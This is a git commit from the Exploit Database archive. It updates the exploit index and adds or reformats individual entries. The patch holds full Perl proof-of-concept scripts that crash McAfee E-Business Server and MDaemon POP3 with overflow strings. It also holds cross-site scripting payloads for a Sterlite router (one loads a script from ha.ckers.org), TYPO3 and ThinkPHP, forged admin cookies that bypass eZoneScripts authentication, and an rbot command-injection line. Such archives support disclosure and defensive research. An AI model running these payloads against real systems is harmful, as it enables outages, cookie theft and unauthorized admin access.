From ff9d2bfa96264b660f627dfefdcb0935ead35fb3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 2 Jul 2014 04:39:03 +0000 Subject: [PATCH] Updated 07_02_2014 --- files.csv | 19 ++++--- platforms/hardware/remote/33938.txt | 28 ++++++++++ platforms/linux/remote/581.c | 6 +-- platforms/multiple/dos/4878.pl | 50 ++++++++--------- platforms/multiple/dos/9454.txt | 78 +++++++++++++-------------- platforms/multiple/webapps/33937.txt | 14 +++++ platforms/php/webapps/33933.txt | 9 ++++ platforms/php/webapps/33934.txt | 27 ++++++++++ platforms/windows/dos/2245.pl | 80 ++++++++++++++-------------- platforms/windows/dos/874.cpp | 6 +-- platforms/windows/remote/33935.txt | 9 ++++ 11 files changed, 209 insertions(+), 117 deletions(-) create mode 100755 platforms/hardware/remote/33938.txt create mode 100755 platforms/multiple/webapps/33937.txt create mode 100755 platforms/php/webapps/33933.txt create mode 100755 platforms/php/webapps/33934.txt create mode 100755 platforms/windows/remote/33935.txt diff --git a/files.csv b/files.csv index 189cbef44..657e3ad34 100755 --- a/files.csv +++ b/files.csv @@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port 578,platforms/windows/dos/578.pl,"MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 579,platforms/bsd/local/579.sh,"BSD bmon <= 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0 580,platforms/linux/remote/580.c,"Monit <= 4.2 Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812 -581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 +581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 584,platforms/windows/remote/584.c,"MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 @@ -694,7 +694,7 @@ id,file,description,date,author,platform,type,port 871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users Vuln",2005-03-11,Ali7,php,webapps,0 -874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 ""3G-A11"" Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0 +874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 ""3G-A11"" - Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093 876,platforms/linux/local/876.c,"PaX Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 Local Buffer Overflow Exploit",2005-03-14,"Kevin Finisterre",linux,local,0 @@ -1938,7 +1938,7 @@ id,file,description,date,author,platform,type,port 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0 -2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0 +2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0 2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0 2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0 @@ -4517,7 +4517,7 @@ id,file,description,date,author,platform,type,port 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates Local File Inclusion Vulnerability",2008-01-09,DSecRG,php,webapps,0 4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 -4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 +4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0 @@ -8917,7 +8917,7 @@ id,file,description,date,author,platform,type,port 9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) Remote SQL Injection Vulnerability",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 (article) Blind SQL Injection Exploit",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection Vuln",2009-08-18,Mr.SQL,php,webapps,0 -9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 +9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 @@ -22877,7 +22877,7 @@ id,file,description,date,author,platform,type,port 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0 25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0 25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0 -25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0 +25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure Vulnerability",2005-06-06,"Miklos Szeredi",linux,local,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability",2005-06-06,Romty,asp,webapps,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 Remote Denial of Service Vulnerability",2005-06-06,"Luigi Auriemma",multiple,dos,0 @@ -27999,7 +27999,7 @@ id,file,description,date,author,platform,type,port 31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog Multiple Local File Include Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0 31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include Vulnerability",2008-02-14,muuratsalo,php,webapps,0 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability",2008-02-15,"Carl Hardwick",multiple,dos,0 -31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0 +31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component - 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 @@ -30559,3 +30559,8 @@ id,file,description,date,author,platform,type,port 33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 Remote Denial of Service Vulnerability",2010-04-29,"Bisphemol A",windows,dos,0 33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0 33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 +33933,platforms/php/webapps/33933.txt,"ThinkPHP 2.0 'index.php' Cross Site Scripting Vulnerability",2010-02-09,zx,php,webapps,0 +33934,platforms/php/webapps/33934.txt,"eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability",2009-02-09,JIKO,php,webapps,0 +33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0 +33937,platforms/multiple/webapps/33937.txt,"TYPO3 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0 +33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0 diff --git a/platforms/hardware/remote/33938.txt b/platforms/hardware/remote/33938.txt new file mode 100755 index 000000000..df611a69f --- /dev/null +++ b/platforms/hardware/remote/33938.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/39928/info + +The Sterlite SAM300 AX Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +*+POST Request+* + +POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) +Gecko/20091221 Firefox/3.5.7 Paros/3.2.13 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Proxy-Connection: keep-alive +Referer: http://192.168.1.1/status/status_statistics.htm +Authorization: Basic YWRtaW46YWRtaW4= +Content-Type: application/x-www-form-urlencoded +Content-length: 101 + +*+POST Parameters+* + +Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org +%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH + +*+Impact+* diff --git a/platforms/linux/remote/581.c b/platforms/linux/remote/581.c index e4f70d0b8..6d1247889 100755 --- a/platforms/linux/remote/581.c +++ b/platforms/linux/remote/581.c @@ -58,6 +58,6 @@ printf (" %d |",dist); } printf ("\nAvrg: %d\n",(stat/PROBE)); close (sock); -} - -// milw0rm.com [2004-10-17] +} + +// milw0rm.com [2004-10-17] diff --git a/platforms/multiple/dos/4878.pl b/platforms/multiple/dos/4878.pl index e48f97421..fec53043e 100755 --- a/platforms/multiple/dos/4878.pl +++ b/platforms/multiple/dos/4878.pl @@ -1,25 +1,25 @@ -#!/usr/bin/perl -# -# -# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) -# -# - tested on Windows and Linux -# -# -# Leon Juranic , -# Infigo IS -# - - -use IO::Socket; - -$saddr = "192.168.1.3"; -$sport = 1718; - -$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;; - -print "> Sending exploit string...\n"; -my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n"); -print $server_sock $exp1; - -# milw0rm.com [2008-01-09] +#!/usr/bin/perl +# +# +# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) +# +# - tested on Windows and Linux +# +# +# Leon Juranic , +# Infigo IS +# + + +use IO::Socket; + +$saddr = "192.168.1.3"; +$sport = 1718; + +$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;; + +print "> Sending exploit string...\n"; +my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n"); +print $server_sock $exp1; + +# milw0rm.com [2008-01-09] diff --git a/platforms/multiple/dos/9454.txt b/platforms/multiple/dos/9454.txt index 6c6c94261..a67f33955 100755 --- a/platforms/multiple/dos/9454.txt +++ b/platforms/multiple/dos/9454.txt @@ -1,39 +1,39 @@ -Three weeks ago, I coded a nice little browser fuzzer, and started -playing with various browsers: IE, Firefox, Safari, Chrome, Opera... - -I found an interesting Safari crash after couple of hours of fuzzing. -It was a stack overflow (and a smile on my face). Since then, every now -and then I took some time to play with it. - -Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3. -Among some other vulnerabilities, this vulnerability has also been fixed. -The Apple announcement is available at -http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html. - -Depends on the perspective, but from my own - Very Bad Luck. C'est la vie, -things like this happen... Some bugs die young. - -This simple and interesting vulnerability is located in WebKit's -JavaScript code that parses floating point numbers. It can be triggered -with script like this: - ---------- - ---------- - -Or something like this... - ---------- - ---------- - -Play little bit with numbers to get a desirable return address, little -bit of heap spraying, and it works. - - -Regards, -Leon Juranic - -# milw0rm.com [2009-08-18] +Three weeks ago, I coded a nice little browser fuzzer, and started +playing with various browsers: IE, Firefox, Safari, Chrome, Opera... + +I found an interesting Safari crash after couple of hours of fuzzing. +It was a stack overflow (and a smile on my face). Since then, every now +and then I took some time to play with it. + +Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3. +Among some other vulnerabilities, this vulnerability has also been fixed. +The Apple announcement is available at +http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html. + +Depends on the perspective, but from my own - Very Bad Luck. C'est la vie, +things like this happen... Some bugs die young. + +This simple and interesting vulnerability is located in WebKit's +JavaScript code that parses floating point numbers. It can be triggered +with script like this: + +--------- + +--------- + +Or something like this... + +--------- + +--------- + +Play little bit with numbers to get a desirable return address, little +bit of heap spraying, and it works. + + +Regards, +Leon Juranic + +# milw0rm.com [2009-08-18] diff --git a/platforms/multiple/webapps/33937.txt b/platforms/multiple/webapps/33937.txt new file mode 100755 index 000000000..36587e719 --- /dev/null +++ b/platforms/multiple/webapps/33937.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/39926/info + + +TYPO3 't3m_cumulus_tagcloud' extension is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks. + +TYPO3 't3m_cumulus_tagcloud' version 1.0 is affected; other versions may be vulnerable as well. + +Example URIs are available: + +http://www.example.com/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E + +http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file diff --git a/platforms/php/webapps/33933.txt b/platforms/php/webapps/33933.txt new file mode 100755 index 000000000..6d946ef71 --- /dev/null +++ b/platforms/php/webapps/33933.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39909/info + +ThinkPHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +ThinkPHP 2.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/index.php?s=1%3Cbody+onload=alert(1)%3E \ No newline at end of file diff --git a/platforms/php/webapps/33934.txt b/platforms/php/webapps/33934.txt new file mode 100755 index 000000000..f2bb86aad --- /dev/null +++ b/platforms/php/webapps/33934.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/39912/info + +eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication. + +Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks. + +The following example cookie data is available: + +Banner Exchange Website and Adult Banner Exchange Website: + +javascript:document.cookie="bannerexchangename=admin; path=/"; +javascript:document.cookie="bannerexchangerand=905; path=/"; + + +Classified Ultra Script: + +javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/"; + + +Apartment Search Script: + +javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/"; + + +phpMiniSite Script: + +javascript:document.cookie="auth=fook; path=/"; \ No newline at end of file diff --git a/platforms/windows/dos/2245.pl b/platforms/windows/dos/2245.pl index 9073f4698..6d323dac5 100755 --- a/platforms/windows/dos/2245.pl +++ b/platforms/windows/dos/2245.pl @@ -1,40 +1,40 @@ -# -# PoC for Mdaemon POP3 preauth heap overflow -# -# Coded by Leon Juranic -# Infigo IS -# -# - -$host = '192.168.0.105'; - -use IO::Socket; - -for ($x = 0 ; $x < 12 ; $x++) -{ - $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') - || die "socket error\n\n"; - recv ($sock, $var, 10000,0); - print $var; - print $sock "USER " . "\@A" x 160 . "\r\n"; - recv ($sock, $var, 10000,0); - print $var; - print $sock "QUIT\r\n"; - recv ($sock, $var, 10000,0); - print $var; - close ($sock); - sleep(1); -} - $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') - || die "socket error\n\n"; - recv ($sock, $var, 10000,0); - print $var; - print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n"; - recv ($sock, $var, 10000,0); - print $var; - print $sock "USER " . "\'A" x 337 . "\r\n"; - recv ($sock, $var, 10000,0); - print $var; - sleep(2); - -# milw0rm.com [2006-08-22] +# +# PoC for Mdaemon POP3 preauth heap overflow +# +# Coded by Leon Juranic +# Infigo IS +# +# + +$host = '192.168.0.105'; + +use IO::Socket; + +for ($x = 0 ; $x < 12 ; $x++) +{ + $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') + || die "socket error\n\n"; + recv ($sock, $var, 10000,0); + print $var; + print $sock "USER " . "\@A" x 160 . "\r\n"; + recv ($sock, $var, 10000,0); + print $var; + print $sock "QUIT\r\n"; + recv ($sock, $var, 10000,0); + print $var; + close ($sock); + sleep(1); +} + $sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') + || die "socket error\n\n"; + recv ($sock, $var, 10000,0); + print $var; + print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n"; + recv ($sock, $var, 10000,0); + print $var; + print $sock "USER " . "\'A" x 337 . "\r\n"; + recv ($sock, $var, 10000,0); + print $var; + sleep(2); + +# milw0rm.com [2006-08-22] diff --git a/platforms/windows/dos/874.cpp b/platforms/windows/dos/874.cpp index bd40bdd80..254bf70a9 100755 --- a/platforms/windows/dos/874.cpp +++ b/platforms/windows/dos/874.cpp @@ -78,6 +78,6 @@ main (int argc, char **argv) { xp_sendpacket(argv[1]); -} - -// milw0rm.com [2005-03-12] +} + +// milw0rm.com [2005-03-12] diff --git a/platforms/windows/remote/33935.txt b/platforms/windows/remote/33935.txt new file mode 100755 index 000000000..037d75c44 --- /dev/null +++ b/platforms/windows/remote/33935.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39915/info + +Rbot is prone to an unauthorized-access vulnerability because it fails to adequately sanitize user supplied data. + +An attacker can exploit this vulnerability to gain administrative rights to the rbot application. This will allow a remote attacker to execute Ruby code within the context of the affected application; other attacks may be possible. + +rbot 0.9.14 is vulnerable; other versions may also be affected. + + !react to /attacker:.*/ with cmd:whoami \ No newline at end of file